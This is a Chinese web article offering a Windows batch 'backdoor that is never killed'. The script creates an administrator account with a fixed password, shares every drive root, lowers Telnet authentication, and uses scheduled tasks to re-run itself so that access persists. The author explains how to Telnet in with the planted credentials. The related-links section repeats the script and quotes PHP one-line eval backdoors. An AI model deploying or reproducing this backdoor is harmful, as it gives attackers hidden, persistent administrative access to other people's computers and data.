用批处理写的永不被杀的后门
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下:
@echo off
@attrib +s + r xyt.bat
@net user xyt hacker /add
@net localgroup administrators xyt /add
@net share c$=c:
@net share d$=d:
@net share e$=e:
@net share f$=f:
@net share g$=g:
@net share h$=h:
@tlntadmn config sec = -ntlm
@net stop schedule
@net start Schedule
@echo at 11:00 c:\WINNT\SYSTEM32\log.bat > c:\WINNT\SYSTEM32\xyt.bat
@echo at 23:00 c:\WINNT\SYSTEM32\log.bat >> c:\WINNT\SYSTEM32\xyt.bat
@at 11:05 c:\WINNT\SYSTEM32\xyt.bat
@at 23:05 c:\WINNT\SYSTEM32\xyt.bat
@net stop telnet
@net start telnet
@exit
这样就会循环运行我们的程序了,即使被人停下来,过几个小时,又回重新运行,呵呵~~
运行后TELNET IP上去,用户名为xyt,密码为hacker。
相关推荐
-
用批处理写的永不被杀的后门
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下: @echo off @attrib +s + r xyt.bat @net user xyt hacker /add @net localgroup administrators xyt /add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @net share
-
批处理bat之永不被杀的后门
代码如下: 复制代码 代码如下: @echo off @attrib +s + r xyt.bat @net user xyt hacker /add @net localgroup administrators xyt /add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @net share g$=g: @net share h$=
-
教你识别简单的免查杀PHP后门
一个最常见的一句话后门可能写作这样 <?php @eval($_POST['cmd']);?> 或这样 <?php @assert($_POST['cmd']);?> tudouya 同学在FREEBUF上给出[一种构造技巧]利用 复制代码 代码如下: <?php @$_++; // $_ = 1 $__=("#"^"|"); // $__ = _ $__.=("."^"~"); // _
-
用批处理写的后门 永不被杀
代码思路是影子鹰DESERT朋友的,原代码比较麻烦,我做了改进,这个后门优点就是小而且不会被杀,放到SYSTEM32目录下就可以了 ,代码如下: @echo off @attrib +s + r xyt.bat @net user xyt hacker /add @net localgroup administrators xyt /add @net share c$=c: @net share d$=d: @net share e$=e: @net share f$=f: @net
-
用批处理实现Auto病毒专杀工具的代码
@ echo off color 0a mkdir c:\windows\system32\algssl.exe mkdir c:\windows\system32\msfir80.exe mkdir c:\windows\system32\msime80.exe attrib +s +r +h c:\windows\system32\algssl.exe attrib +s +r +h c:\windows\system32\msfir80.exe attrib +s +r +h c:\win
-
批处理写的电视机效果代码
复制代码 代码如下: @echo off title 收不到台的电视机 :a cls for /l %%b in (1,6,7)do ( color %%bf ) goto a
-
批处理写的 oracle 数据库备份还原工具
这是针对oracle编写的,可以用在不同的电脑上,因为它会自动读取当前电脑的环境变量,从而取得oracle的安装路径,唯一有一点不足的地方是程序中运行过程中会产生一个中间文本文件,不过这并不碍大事,备份或者还原完了以后将会自动删除产生文本文件,代码如下: 复制代码 代码如下: @echo off&setlocal enabledelayedexpansion color 0a :start for /f "tokens=2 delims==" %%a in ('path') d
-
写的不错批处理教程一
大家知不知道默认共享这回事?这东西用不着的地方可就不是好东西了.所以就要删掉.但这东西是每次系统重起后都会重新创建的.所以每次都要重新打开cmd重新删掉一下.极为麻烦.但有了批处理文件就不一样了,先把命令输入到批处理文件中,然后加入到启动项中,每次启动就会自动运行,免去了每次输入命令的麻烦. 如何创建批处理文件? 将记事本打开,什么都不用写,然后选择文件,保存.保存类型选择所有文件,文件名则命名为*.bat这个*代表是文件名,你可以随便的起.保存好之后,看看你保存的地方,会出现一个白色窗口里有个
-
批处理入门与提高
大家知不知道默认共享这回事?这东西用不着的地方可就不是好东西了.所以就要删掉.但这东西是每次系统重起后都会重新创建的.所以每次都要重新打开cmd重新删掉一下.极为麻烦.但有了批处理文件就不一样了,先把命令输入到批处理文件中,然后加入到启动项中,每次启动就会自动运行,免去了每次输入命令的麻烦. 如何创建批处理文件? 将记事本打开,什么都不用写,然后选择文件,保存.保存类型选择所有文件,文件名则命名为*.bat这个*代表是文件名,你可以随便的起.保存好之后,看看你保存的地方,会出现一个白色窗口里有个
-
tel.xls.vbs xls专杀工具
1.双击运行tel.xls.vbs即可消灭Trojan.Win32.Patched.v病毒. 2.本专杀使用VBS脚本编写,执行效率高,不过缺乏智能性,我也不愿去添加那些IF判断语句来进行智能判断,这没必要.只要是我分析的病毒而写出的对于专杀都是有效的,当然病毒变异了那就没办法了,任何专杀都是这样.有变种可以与我联系http://hi.baidu.com/ycosxhack. 3.学习如何用VBS写自己的专杀工具可以查看这里: http://hi.baidu.com/ycosxhack/blog
随机推荐
- dedecms ckeditor编辑器添加链接默认新窗口打开的修改方法
- 详谈c++11 final与override说明符
- JS点击某个图标或按钮弹出文件选择框的实现代码
- JavaScript中神奇的call()方法
- gulp-uglify 与gulp.watch()配合使用时报错(重复压缩问题)
- 怎样使用Python脚本日志功能
- C#利用子线程刷新主线程分享教程
- 详解Node.js项目APM监控之New Relic
- 病毒专杀VBS模板更新
- 正确使用MySQL INSERT INTO语句
- 微信小程序自定义导航隐藏和显示功能
- 在javascript中随机数 math random如何生成指定范围数值的随机数
- js实现上一页下一页的效果【附代码】
- ISA Server 的故障排除工具(3)
- Android调节屏幕亮度实现代码
- 用php发送带附件的Email
- .NET Core中依赖注入AutoMapper的方法示例
- 详解layui弹窗父子窗口之间传参数的方法
- Android自定义星星可滑动评分控件
- Android Studio配置文件路径修改的方法